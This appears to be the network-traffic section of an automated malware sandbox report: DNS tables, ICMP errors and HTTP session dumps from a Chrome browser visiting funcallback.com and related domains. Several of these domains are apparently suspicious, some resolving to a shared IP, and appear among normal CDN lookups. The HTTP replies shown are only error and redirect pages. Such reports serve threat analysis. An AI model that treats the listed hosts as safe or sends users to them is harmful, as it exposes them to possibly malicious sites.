                                                                                                                                      Apr 24, 2024 12:14:02.127819061 CEST53493361.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:05.031038046 CEST5966353192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:05.031251907 CEST6318453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:05.046998978 CEST6399253192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:05.047132015 CEST6195453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:05.184881926 CEST53596631.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:05.184962034 CEST53631841.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:06.014671087 CEST5540553192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:06.014789104 CEST5922653192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:06.015008926 CEST5338453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:06.015120983 CEST5547353192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:06.016494036 CEST5337353192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:06.016644001 CEST5515453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:06.167643070 CEST53615081.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:06.169507027 CEST53554051.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:06.169735909 CEST53592261.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:06.515008926 CEST53533731.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:06.515069962 CEST53551541.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:06.518968105 CEST53533841.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:06.666579962 CEST53554731.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:07.778301954 CEST53505551.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:10.695565939 CEST5274653192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:10.695707083 CEST5260953192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:10.849210024 CEST53527461.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:10.849234104 CEST53526091.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:11.296298981 CEST5164053192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:11.296444893 CEST5051153192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:11.548723936 CEST6248453192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:11.549066067 CEST5804753192.168.2.161.1.1.1
                                                                                                                                      Apr 24, 2024 12:14:11.702236891 CEST53580471.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:11.703022003 CEST53624841.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:11.723249912 CEST53505111.1.1.1192.168.2.16
                                                                                                                                      Apr 24, 2024 12:14:11.723774910 CEST53516401.1.1.1192.168.2.16
                                                                                                                                      TimestampSource IPDest IPChecksumCodeType
                                                                                                                                      Apr 24, 2024 12:12:28.006705999 CEST192.168.2.161.1.1.1c22a(Port unreachable)Destination Unreachable
                                                                                                                                      Apr 24, 2024 12:14:02.020793915 CEST192.168.2.161.1.1.1c22a(Port unreachable)Destination Unreachable
                                                                                                                                      Apr 24, 2024 12:14:06.666657925 CEST192.168.2.161.1.1.1c227(Port unreachable)Destination Unreachable
                                                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                      Apr 24, 2024 12:12:26.633270025 CEST192.168.2.161.1.1.10x38afStandard query (0)funcallback.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:26.633474112 CEST192.168.2.161.1.1.10x9413Standard query (0)funcallback.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.343492031 CEST192.168.2.161.1.1.10xc655Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.343585968 CEST192.168.2.161.1.1.10x1ed9Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:39.864927053 CEST192.168.2.161.1.1.10xab09Standard query (0)funcallback.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:39.865257025 CEST192.168.2.161.1.1.10x614bStandard query (0)funcallback.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.711821079 CEST192.168.2.168.8.8.80x8c6dStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.712073088 CEST192.168.2.161.1.1.10xca4bStandard query (0)google.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:24.353991032 CEST192.168.2.161.1.1.10x865dStandard query (0)dentalhealthstop.co.ukA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:24.354131937 CEST192.168.2.161.1.1.10xfa4dStandard query (0)dentalhealthstop.co.uk65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.055840015 CEST192.168.2.161.1.1.10xf0ddStandard query (0)maxcdn.bootstrapcdn.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.056628942 CEST192.168.2.161.1.1.10x2141Standard query (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.056628942 CEST192.168.2.161.1.1.10xdfd7Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.056862116 CEST192.168.2.161.1.1.10xa48cStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.165281057 CEST192.168.2.161.1.1.10xe0bfStandard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.165446043 CEST192.168.2.161.1.1.10xc6e9Standard query (0)code.jquery.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.182948112 CEST192.168.2.161.1.1.10x7193Standard query (0)dentalhealthstop.co.ukA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.183132887 CEST192.168.2.161.1.1.10xaa1eStandard query (0)dentalhealthstop.co.uk65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:28.177676916 CEST192.168.2.161.1.1.10x2c38Standard query (0)use.fontawesome.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:28.177789927 CEST192.168.2.161.1.1.10x5339Standard query (0)use.fontawesome.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.697887897 CEST192.168.2.161.1.1.10x3badStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.698056936 CEST192.168.2.161.1.1.10x3a61Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:59.629976034 CEST192.168.2.161.1.1.10xb732Standard query (0)exodontia.infoA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:59.630105972 CEST192.168.2.161.1.1.10x1a1dStandard query (0)exodontia.info65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:01.687583923 CEST192.168.2.161.1.1.10xb0e2Standard query (0)funcallback.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:01.687724113 CEST192.168.2.161.1.1.10x7471Standard query (0)funcallback.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:01.972642899 CEST192.168.2.161.1.1.10x568Standard query (0)use.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:01.972810984 CEST192.168.2.161.1.1.10x4643Standard query (0)use.typekit.net65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:05.031038046 CEST192.168.2.161.1.1.10x1bbbStandard query (0)exodontia.infoA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:05.031251907 CEST192.168.2.161.1.1.10xb087Standard query (0)exodontia.info65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:05.046998978 CEST192.168.2.161.1.1.10x2224Standard query (0)p.typekit.netA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:05.047132015 CEST192.168.2.161.1.1.10xcf46Standard query (0)p.typekit.net65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.014671087 CEST192.168.2.161.1.1.10x1103Standard query (0)stake.libertariancounterpoint.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.014789104 CEST192.168.2.161.1.1.10xc630Standard query (0)stake.libertariancounterpoint.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.015008926 CEST192.168.2.161.1.1.10x2614Standard query (0)gspiceyl.comA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.015120983 CEST192.168.2.161.1.1.10x6ea1Standard query (0)gspiceyl.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.016494036 CEST192.168.2.161.1.1.10x3d01Standard query (0)debasesingle.lifeA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.016644001 CEST192.168.2.161.1.1.10x89fdStandard query (0)debasesingle.life65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:10.695565939 CEST192.168.2.161.1.1.10x551bStandard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:10.695707083 CEST192.168.2.161.1.1.10x4d66Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:11.296298981 CEST192.168.2.161.1.1.10x21f7Standard query (0)cdnreport.netA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:11.296444893 CEST192.168.2.161.1.1.10xee03Standard query (0)cdnreport.net65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:11.548723936 CEST192.168.2.161.1.1.10x9c81Standard query (0)upload.wikimedia.orgA (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:11.549066067 CEST192.168.2.161.1.1.10xb546Standard query (0)upload.wikimedia.org65IN (0x0001)false
                                                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                      Apr 24, 2024 12:12:27.503508091 CEST1.1.1.1192.168.2.160x38afNo error (0)funcallback.com31.41.44.109A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.497124910 CEST1.1.1.1192.168.2.160xc655No error (0)www.google.com142.250.141.106A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.497124910 CEST1.1.1.1192.168.2.160xc655No error (0)www.google.com142.250.141.104A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.497124910 CEST1.1.1.1192.168.2.160xc655No error (0)www.google.com142.250.141.103A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.497124910 CEST1.1.1.1192.168.2.160xc655No error (0)www.google.com142.250.141.147A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.497124910 CEST1.1.1.1192.168.2.160xc655No error (0)www.google.com142.250.141.105A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.497124910 CEST1.1.1.1192.168.2.160xc655No error (0)www.google.com142.250.141.99A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:31.497149944 CEST1.1.1.1192.168.2.160x1ed9No error (0)www.google.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:12:40.018759012 CEST1.1.1.1192.168.2.160xab09No error (0)funcallback.com31.41.44.109A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.865401983 CEST1.1.1.1192.168.2.160xca4bNo error (0)google.com142.251.2.139A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.865401983 CEST1.1.1.1192.168.2.160xca4bNo error (0)google.com142.251.2.113A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.865401983 CEST1.1.1.1192.168.2.160xca4bNo error (0)google.com142.251.2.101A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.865401983 CEST1.1.1.1192.168.2.160xca4bNo error (0)google.com142.251.2.102A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.865401983 CEST1.1.1.1192.168.2.160xca4bNo error (0)google.com142.251.2.138A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.865401983 CEST1.1.1.1192.168.2.160xca4bNo error (0)google.com142.251.2.100A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:17.882525921 CEST8.8.8.8192.168.2.160x8c6dNo error (0)google.com142.251.40.46A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:24.804990053 CEST1.1.1.1192.168.2.160x865dNo error (0)dentalhealthstop.co.uk91.238.164.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.209713936 CEST1.1.1.1192.168.2.160xf0ddNo error (0)maxcdn.bootstrapcdn.com104.18.11.207A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.209713936 CEST1.1.1.1192.168.2.160xf0ddNo error (0)maxcdn.bootstrapcdn.com104.18.10.207A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.209949017 CEST1.1.1.1192.168.2.160xa48cNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.209965944 CEST1.1.1.1192.168.2.160xdfd7No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.209965944 CEST1.1.1.1192.168.2.160xdfd7No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:26.210288048 CEST1.1.1.1192.168.2.160x2141No error (0)maxcdn.bootstrapcdn.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.319452047 CEST1.1.1.1192.168.2.160xe0bfNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.319452047 CEST1.1.1.1192.168.2.160xe0bfNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.319452047 CEST1.1.1.1192.168.2.160xe0bfNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.319452047 CEST1.1.1.1192.168.2.160xe0bfNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:27.336849928 CEST1.1.1.1192.168.2.160x7193No error (0)dentalhealthstop.co.uk91.238.164.176A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:28.330836058 CEST1.1.1.1192.168.2.160x2c38No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:28.331370115 CEST1.1.1.1192.168.2.160x5339No error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.851244926 CEST1.1.1.1192.168.2.160x3a61No error (0)www.google.com65IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.851265907 CEST1.1.1.1192.168.2.160x3badNo error (0)www.google.com142.250.101.103A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.851265907 CEST1.1.1.1192.168.2.160x3badNo error (0)www.google.com142.250.101.104A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.851265907 CEST1.1.1.1192.168.2.160x3badNo error (0)www.google.com142.250.101.147A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.851265907 CEST1.1.1.1192.168.2.160x3badNo error (0)www.google.com142.250.101.99A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.851265907 CEST1.1.1.1192.168.2.160x3badNo error (0)www.google.com142.250.101.106A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:48.851265907 CEST1.1.1.1192.168.2.160x3badNo error (0)www.google.com142.250.101.105A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:13:59.964988947 CEST1.1.1.1192.168.2.160xb732No error (0)exodontia.info153.92.6.142A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:01.841665030 CEST1.1.1.1192.168.2.160xb0e2No error (0)funcallback.com31.41.44.109A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:02.126576900 CEST1.1.1.1192.168.2.160x568No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:02.127089977 CEST1.1.1.1192.168.2.160x4643No error (0)use.typekit.netuse-stls.adobe.com.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:05.184881926 CEST1.1.1.1192.168.2.160x1bbbNo error (0)exodontia.info153.92.6.142A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:05.200726032 CEST1.1.1.1192.168.2.160x2224No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:05.201183081 CEST1.1.1.1192.168.2.160xcf46No error (0)p.typekit.netp.typekit.net-stls-v3.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.169507027 CEST1.1.1.1192.168.2.160x1103No error (0)stake.libertariancounterpoint.com185.158.251.240A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.515008926 CEST1.1.1.1192.168.2.160x3d01No error (0)debasesingle.life31.41.44.109A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:06.518968105 CEST1.1.1.1192.168.2.160x2614No error (0)gspiceyl.com31.41.44.109A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:10.849210024 CEST1.1.1.1192.168.2.160x551bNo error (0)upload.wikimedia.org198.35.26.112A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:11.703022003 CEST1.1.1.1192.168.2.160x9c81No error (0)upload.wikimedia.org198.35.26.112A (IP address)IN (0x0001)false
                                                                                                                                      Apr 24, 2024 12:14:11.723774910 CEST1.1.1.1192.168.2.160x21f7No error (0)cdnreport.net46.17.248.12A (IP address)IN (0x0001)false
                                                                                                                                      • funcallback.com
                                                                                                                                      • https:
                                                                                                                                        • cdnjs.cloudflare.com
                                                                                                                                        • maxcdn.bootstrapcdn.com
                                                                                                                                        • dentalhealthstop.co.uk
                                                                                                                                        • code.jquery.com
                                                                                                                                        • www.google.com
                                                                                                                                        • exodontia.info
                                                                                                                                        • stake.libertariancounterpoint.com
                                                                                                                                        • debasesingle.life
                                                                                                                                        • gspiceyl.com
                                                                                                                                        • upload.wikimedia.org
                                                                                                                                        • cdnreport.net
                                                                                                                                      • slscr.update.microsoft.com
                                                                                                                                      • fs.microsoft.com
                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.164972231.41.44.109807060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 24, 2024 12:12:40.360044956 CEST430OUTGET / HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      Apr 24, 2024 12:12:40.726587057 CEST347INHTTP/1.1 301 Moved Permanently
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:40 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Content-Length: 0
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:12:40 GMT
                                                                                                                                      Location: https://funcallback.com/
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      Access-Control-Allow-Origin: *


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.164972331.41.44.109807060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 24, 2024 12:13:10.704449892 CEST212INHTTP/1.0 408 Request Time-out
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.164972431.41.44.109807060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      Apr 24, 2024 12:13:10.803324938 CEST212INHTTP/1.0 408 Request Time-out
                                                                                                                                      Cache-Control: no-cache
                                                                                                                                      Connection: close
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 38 20 52 65 71 75 65 73 74 20 54 69 6d 65 2d 6f 75 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 64 69 64 6e 27 74 20 73 65 6e 64 20 61 20 63 6f 6d 70 6c 65 74 65 20 72 65 71 75 65 73 74 20 69 6e 20 74 69 6d 65 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <html><body><h1>408 Request Time-out</h1>Your browser didn't send a complete request in time.</body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      0192.168.2.164970631.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:28 UTC658OUTGET / HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                                                      Sec-Fetch-User: ?1
                                                                                                                                      Sec-Fetch-Dest: document
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:28 UTC273INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:28 GMT
                                                                                                                                      Content-Type: text/html; charset=utf-8
                                                                                                                                      Content-Length: 147
                                                                                                                                      Connection: close
                                                                                                                                      Cache-Control: no-cache, no-store, must-revalidate
                                                                                                                                      Expires: Wed, 24 Apr 2024 10:12:28 GMT
                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                      2024-04-24 10:12:28 UTC147INData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 0a 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.24.0</center></body></html>


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      1192.168.2.164970731.41.44.1094437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:29 UTC586OUTGET /favicon.ico HTTP/1.1
                                                                                                                                      Host: funcallback.com
                                                                                                                                      Connection: keep-alive
                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                      Referer: https://funcallback.com/
                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                      2024-04-24 10:12:29 UTC143INHTTP/1.1 404 Not Found
                                                                                                                                      Server: nginx
                                                                                                                                      Date: Wed, 24 Apr 2024 10:12:29 GMT
                                                                                                                                      Content-Type: text/html
                                                                                                                                      Content-Length: 548
                                                                                                                                      Connection: close
                                                                                                                                      2024-04-24 10:12:29 UTC548INData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20
                                                                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome


                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                      2192.168.2.1649710142.250.141.1064437060C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                      2024-04-24 10:12:33 UTC613OUTGET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
